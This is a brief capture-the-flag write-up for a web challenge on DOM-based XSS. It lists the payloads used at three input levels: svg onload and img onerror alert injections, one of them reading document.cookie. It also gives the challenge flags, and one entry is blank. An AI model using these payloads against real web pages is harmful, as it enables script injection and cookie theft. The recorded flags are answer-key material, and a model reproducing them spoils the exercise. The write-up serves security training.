- The description asks us to pop alerts in the given web page using XSS attacks
- The flags are presented in the console tab when an xss attack is done in the webpage. There are three input levels = 00 , 01 , 10
- For 00 = "
"
- It is a DOM based XSS
- Flag = p3nt35t{IAmTh3S3n4t3}
- For 01 = "“></svg/ onload=alert(1)><img /src/=1 onerror=alert(1)>javascript:alert(document.cookie)\“-alert(1)}//<><img /src/=1 onerror=alert(1)>
- Flag = p3nt35t{W3r3D00m3d}
- It is a DOM based XSS
- For 10 = "></svg onload=alert(1)>"
- Flag = p3nt35t{Its0v3rAn4k1n}
- It’s a DOM based XSS